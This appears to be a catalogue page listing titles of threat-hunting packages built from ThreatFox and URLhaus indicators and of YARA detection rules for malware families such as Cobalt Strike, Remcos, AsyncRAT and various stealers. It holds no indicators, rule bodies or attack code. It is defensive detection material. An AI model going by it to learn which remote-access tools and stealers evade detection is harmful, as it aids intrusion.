Hunt package for 48 IOCs associated with ClearFake
ThreatFox: FAKEUPDATES IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 2 IOCs associated with FAKEUPDATES
ThreatFox: SmartApeSG IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 4 IOCs associated with SmartApeSG
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 23 IOCs associated with Unknown malware
ThreatFox: Unknown RAT IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 3 IOCs associated with Unknown RAT
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 13 IOCs associated with AdaptixC2
ThreatFox: Amadey IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
Hunt package for 2 IOCs associated with Amadey
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEvents
Hunt package for 13 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 14 IOCs associated with Cobalt Strike
ThreatFox: DCRat IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 7 IOCs associated with DCRat
ThreatFox: Havoc IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Havoc
ThreatFox: Quasar RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Quasar RAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 14 IOCs associated with Remcos
ThreatFox: Sliver IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Sliver
ThreatFox: Vidar IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 19 IOCs associated with Vidar
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 12 IOCs associated with VShell
ce enfal cmstar debug msg
yara low
YARA rule: ce_enfal_cmstar_debug_msg
Enfal
yara low
Enfal
Detects a certain type of Enfal Malware
yara high
Detects a certain type of Enfal Malware
Generic Rule to detect the Enfal Malware
yara high
Generic Rule to detect the Enfal Malware
Enfal code tricks
yara low
Enfal code tricks
Enfal Identifying Strings
yara low
Enfal Identifying Strings
Ezcob
yara low
Ezcob
Ezcob Identifying Strings
yara low
Ezcob Identifying Strings
Favorite code features
yara low
Favorite code features
Favorite Identifying Strings
yara low
Favorite Identifying Strings
Detects unmodified FUDCrypt samples
yara low
Detects unmodified FUDCrypt samples
Glasses family
yara low
Glasses family
Glasses code features
yara low
Glasses code features
Strings used by Glasses
yara low
Strings used by Glasses
Win32.Gozi
yara low
Win32.Gozi
Grozlex Stealer - Possible HCStealer
yara low
Grozlex Stealer - Possible HCStealer
Identifier for html variant of FAKEM
yara low
Identifier for html variant of FAKEM
rc4_stack_key
yara low
rc4_stack_key
success_fail_codes
yara low
success_fail_codes
ThreatFox: Mirai IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Mirai
ThreatFox: RedTail IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 6 IOCs associated with RedTail
ThreatFox: XMRIG IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with XMRIG
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 78 IOCs associated with ClearFake
ThreatFox: FAKEUPDATES IOCs
ioc-hunt high
DnsEvents
Hunt package for 3 IOCs associated with FAKEUPDATES
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 10 IOCs associated with KongTuke
ThreatFox: SmartApeSG IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 4 IOCs associated with SmartApeSG
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
Hunt package for 3 IOCs associated with Unknown malware
ThreatFox: Unknown Loader IOCs
ioc-hunt high
DnsEvents
Hunt package for 4 IOCs associated with Unknown Loader
ThreatFox: Unknown RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 22 IOCs associated with Unknown RAT
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with AdaptixC2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 12 IOCs associated with AsyncRAT
ThreatFox: Azorult IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 2 IOCs associated with Azorult
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 16 IOCs associated with Cobalt Strike
ThreatFox: Coinminer IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 3 IOCs associated with Coinminer
ThreatFox: DCRat IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with DCRat
ThreatFox: Gh0stnet IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 3 IOCs associated with Gh0stnet
ThreatFox: Havoc IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Havoc
ThreatFox: Meterpreter IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Meterpreter
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Nanocore RAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with Remcos
ThreatFox: Remus IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
Hunt package for 3 IOCs associated with Remus
ThreatFox: SPICA IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with SPICA
ThreatFox: ValleyRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEvents
Hunt package for 7 IOCs associated with ValleyRAT
ThreatFox: Vidar IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 42 IOCs associated with Vidar
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with VShell
ThreatFox: XWorm IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 3 IOCs associated with XWorm
URLhaus: 124-198-132-139 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as 124-198-132-139
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 10 malicious URLs tagged as 32-bit
URLhaus: 54e64e Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as 54e64e
URLhaus: AgentTesla Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as AgentTesla
URLhaus: ascii Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 10 malicious URLs tagged as ascii
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 10 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as elf
URLhaus: encrypted Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as encrypted
URLhaus: GuLoader Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as GuLoader
URLhaus: hta Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 13 malicious URLs tagged as hta
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 11 malicious URLs tagged as malware_download
URLhaus: opendir Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 7 malicious URLs tagged as opendir
URLhaus: rat Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as rat
f0xy malware downloader
yara low
f0xy malware downloader
ThreatFox: Evilginx IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Evilginx
ThreatFox: Mirai IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Mirai
ThreatFox: RedTail IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsUrlClickEvents
Hunt package for 8 IOCs associated with RedTail
ThreatFox: XMRIG IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEvents
Hunt package for 7 IOCs associated with XMRIG
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 50 IOCs associated with ClearFake
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 14 IOCs associated with Unknown malware
ThreatFox: Unknown Stealer IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 8 IOCs associated with Unknown Stealer
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with AdaptixC2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 9 IOCs associated with AsyncRAT
ThreatFox: Azorult IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 2 IOCs associated with Azorult
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 21 IOCs associated with Cobalt Strike
ThreatFox: Coinminer IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 3 IOCs associated with Coinminer
ThreatFox: DCRat IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with DCRat
ThreatFox: Gh0stnet IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 3 IOCs associated with Gh0stnet
ThreatFox: Kimsuky IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 4 IOCs associated with Kimsuky
ThreatFox: Luca Stealer IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 3 IOCs associated with Luca Stealer
ThreatFox: Phemedrone Stealer IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 3 IOCs associated with Phemedrone Stealer
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 12 IOCs associated with Remcos
ThreatFox: Remus IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 2 IOCs associated with Remus
ThreatFox: Satacom IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 4 IOCs associated with Satacom
ThreatFox: Stealc IOCs
ioc-hunt high
DeviceFileEventsUrlClickEvents
Hunt package for 4 IOCs associated with Stealc
ThreatFox: Taurus Stealer IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 6 IOCs associated with Taurus Stealer
ThreatFox: troystealer IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 6 IOCs associated with troystealer
ThreatFox: ValleyRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEvents
Hunt package for 8 IOCs associated with ValleyRAT
ThreatFox: Vidar IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 6 IOCs associated with Vidar
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 9 IOCs associated with VShell
Elex DLL 32 bits
yara low
Elex DLL 32 bits
Elex DLL 64 bits
yara low
Elex DLL 64 bits
Elex Service 32 bits
yara low
Elex Service 32 bits
Elex Service 64 bits
yara low
Elex Service 64 bits
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 59 malicious URLs tagged as 32-bit
URLhaus: arm Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 5 malicious URLs tagged as arm
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 26 malicious URLs tagged as ClearFake
URLhaus: dropped-by-Phorpiex Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as dropped-by-Phorpiex
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as elf
Athena HTTP identification
yara low
Athena HTTP identification
Athena IRC v1.8.x, 2.x identification
Generic signature for Hacktool.Atmos.Builder cracked version
Generic Spyware.Citadel.Atmos Signature
Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer
Bangat
yara low
Bangat
Bangat code features
yara low
Bangat code features
Bangat Identifying Strings
yara low
Bangat Identifying Strings
Batel backdoor
yara low
Batel backdoor
Boouset code tricks
yara low
Boouset code tricks
Bublik Trojan Downloader
yara low
Bublik Trojan Downloader
CAP HookExKeylogger
yara low
YARA rule: CAP_HookExKeylogger
Win32-variant of Chicken ident for both dropper and dropped file
Linux-variant of Chicken ident for both dropper and dropped file
Cookies
yara low
Cookies
Cookies Identifying Strings
yara low
Cookies Identifying Strings
Rule to detect the Corkow DLL files
yara low
Rule to detect the Corkow DLL files
cxpid code features
yara low
cxpid code features
cxpid Identifying Strings
yara low
cxpid Identifying Strings
Rule to detect ELF.DDosTf infection
yara low
Rule to detect ELF.DDosTf infection
Derkziel info stealer (Steam, Opera, Yandex, ...)
Detects the Dexter Trojan/Agent http://goo.gl/oBvy8b
Rule to detect Eicar pattern
yara low
Rule to detect Eicar pattern
ThreatFox: Mirai IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 3 IOCs associated with Mirai
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 74 IOCs associated with ClearFake
ThreatFox: EtherRAT IOCs
ioc-hunt high
DnsEvents
Hunt package for 6 IOCs associated with EtherRAT
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 3 IOCs associated with KongTuke
ThreatFox: SmartApeSG IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 3 IOCs associated with SmartApeSG
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 4 IOCs associated with Unknown malware
ThreatFox: Unknown Loader IOCs
ioc-hunt high
DnsEvents
Hunt package for 5 IOCs associated with Unknown Loader
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 10 IOCs associated with AdaptixC2
ThreatFox: Amadey IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 3 IOCs associated with Amadey
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 12 IOCs associated with AsyncRAT
ThreatFox: BianLian IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with BianLian
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Cobalt Strike
ThreatFox: DCRat IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with DCRat
ThreatFox: Ghost RAT IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 3 IOCs associated with Ghost RAT
ThreatFox: Loki Password Stealer (PWS) IOCs
ioc-hunt high
DeviceFileEventsUrlClickEvents
Hunt package for 4 IOCs associated with Loki Password Stealer (PWS)
ThreatFox: Meterpreter IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Meterpreter
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 6 IOCs associated with Nanocore RAT
ThreatFox: Quasar RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Quasar RAT
ThreatFox: RansomHub IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with RansomHub
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 11 IOCs associated with Remcos
ThreatFox: Remus IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
Hunt package for 2 IOCs associated with Remus
ThreatFox: Taurus Stealer IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 3 IOCs associated with Taurus Stealer
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 4 IOCs associated with Vidar
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 6 IOCs associated with VShell
Elex Installer
yara low
Elex Installer
Elex Installer NSIS
yara low
Elex Installer NSIS
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 57 malicious URLs tagged as 32-bit
URLhaus: 54e64e Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as 54e64e
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 24 malicious URLs tagged as ClearFake
URLhaus: CoinMiner Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 6 malicious URLs tagged as CoinMiner
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as elf
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as malware_download
URLhaus: sh Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as sh
Detecting HTML strings used by Agent Tesla malware
agenttesla smtp variant
yara low
YARA rule: agenttesla_smtp_variant
IOC looks for the creation or termination of a process associated with the Andromeda Trojan. The malware will execute the msiexec.exe within the suspicious directory. Shortly after, it creates and inj
APT28 downdelph magic string
yara low
APT28 downdelph magic string
APT28 downdelph string on MBR (get your MBR with BOOTICE on Win or #dd if=/dev/sda of=./sda.mbr bs=512 count=1
Arkei
yara low
YARA rule: Arkei
Generic PowerShell Malware Rule
yara low
Generic PowerShell Malware Rule
ThreatFox: Tsunami IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEvents
Hunt package for 4 IOCs associated with Tsunami
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 70 IOCs associated with ClearFake
ThreatFox: EtherRAT IOCs
ioc-hunt high
DnsEvents
Hunt package for 6 IOCs associated with EtherRAT
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 7 IOCs associated with KongTuke
ThreatFox: SmartApeSG IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 7 IOCs associated with SmartApeSG
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 6 IOCs associated with Unknown malware
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 11 IOCs associated with AdaptixC2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 10 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with Cobalt Strike
ThreatFox: Lumma Stealer IOCs
ioc-hunt high
DnsEvents
Hunt package for 7 IOCs associated with Lumma Stealer
ThreatFox: Quasar RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Quasar RAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 16 IOCs associated with Remcos
ThreatFox: Remus IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 2 IOCs associated with Remus
ThreatFox: Stealc IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 28 IOCs associated with Stealc
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 9 IOCs associated with Vidar
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with VShell
URLhaus: 282234 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as 282234
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 62 malicious URLs tagged as 32-bit
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 32 malicious URLs tagged as ClearFake
Gamarue_Andromeda
yara low
Gamarue_Andromeda
ThreatFox: Evilginx IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with Evilginx
ThreatFox: Mirai IOCs
ioc-hunt high
DnsEvents
Hunt package for 2 IOCs associated with Mirai
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 78 IOCs associated with ClearFake
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 2 IOCs associated with KongTuke
ThreatFox: SmartApeSG IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 7 IOCs associated with SmartApeSG
ThreatFox: AMOS IOCs
ioc-hunt high
DeviceFileEventsDnsEvents
Hunt package for 5 IOCs associated with AMOS
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 20 IOCs associated with Unknown malware
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 12 IOCs associated with AdaptixC2
ThreatFox: Agent Tesla IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 3 IOCs associated with Agent Tesla
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 6 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 31 IOCs associated with Cobalt Strike
ThreatFox: Coinminer IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 6 IOCs associated with Coinminer
ThreatFox: DarkTortilla IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 3 IOCs associated with DarkTortilla
ThreatFox: DCRat IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with DCRat
ThreatFox: FireCrypt IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 9 IOCs associated with FireCrypt
ThreatFox: GCleaner IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 3 IOCs associated with GCleaner
ThreatFox: GootKit IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 3 IOCs associated with GootKit
ThreatFox: Havoc IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 8 IOCs associated with Havoc
ThreatFox: MASS Logger IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 3 IOCs associated with MASS Logger
ThreatFox: Meterpreter IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Meterpreter
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEvents
Hunt package for 4 IOCs associated with Nanocore RAT
ThreatFox: Phorpiex IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 6 IOCs associated with Phorpiex
ThreatFox: PureRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEvents
Hunt package for 6 IOCs associated with PureRAT
ThreatFox: Quasar RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with Quasar RAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 9 IOCs associated with Remcos
ThreatFox: Sliver IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Sliver
ThreatFox: SmokeLoader IOCs
ioc-hunt high
UrlClickEvents
Hunt package for 2 IOCs associated with SmokeLoader
ThreatFox: StrelaStealer IOCs
ioc-hunt high
DeviceFileEventsDnsEvents
Hunt package for 4 IOCs associated with StrelaStealer
ThreatFox: TinyLoader IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 3 IOCs associated with TinyLoader
ThreatFox: troystealer IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 3 IOCs associated with troystealer
ThreatFox: ValleyRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with ValleyRAT
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 6 IOCs associated with Vidar
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 9 IOCs associated with VShell
ThreatFox: XWorm IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 3 IOCs associated with XWorm
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 31 malicious URLs tagged as 32-bit
URLhaus: censys Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 12 malicious URLs tagged as censys
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 16 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 24 malicious URLs tagged as elf
URLhaus: mirai Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 13 malicious URLs tagged as mirai
ThreatFox: Evilginx IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Evilginx
ThreatFox: Mirai IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
Hunt package for 5 IOCs associated with Mirai
ThreatFox: RedTail IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with RedTail
ThreatFox: XMRIG IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 4 IOCs associated with XMRIG
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 27 IOCs associated with ClearFake
ThreatFox: SmartApeSG IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 3 IOCs associated with SmartApeSG
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 25 IOCs associated with Unknown malware
ThreatFox: Unknown RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 7 IOCs associated with Unknown RAT
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with AdaptixC2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 7 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 13 IOCs associated with Cobalt Strike
ThreatFox: DCRat IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with DCRat
ThreatFox: PureLogs Stealer IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with PureLogs Stealer
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 14 IOCs associated with Remcos
ThreatFox: Remus IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
Hunt package for 66 IOCs associated with Remus
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 5 IOCs associated with Vidar
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with VShell
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 36 malicious URLs tagged as 32-bit
URLhaus: apk Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 7 malicious URLs tagged as apk
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 15 malicious URLs tagged as ClearFake
ThreatFox: Kimwolf IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Kimwolf
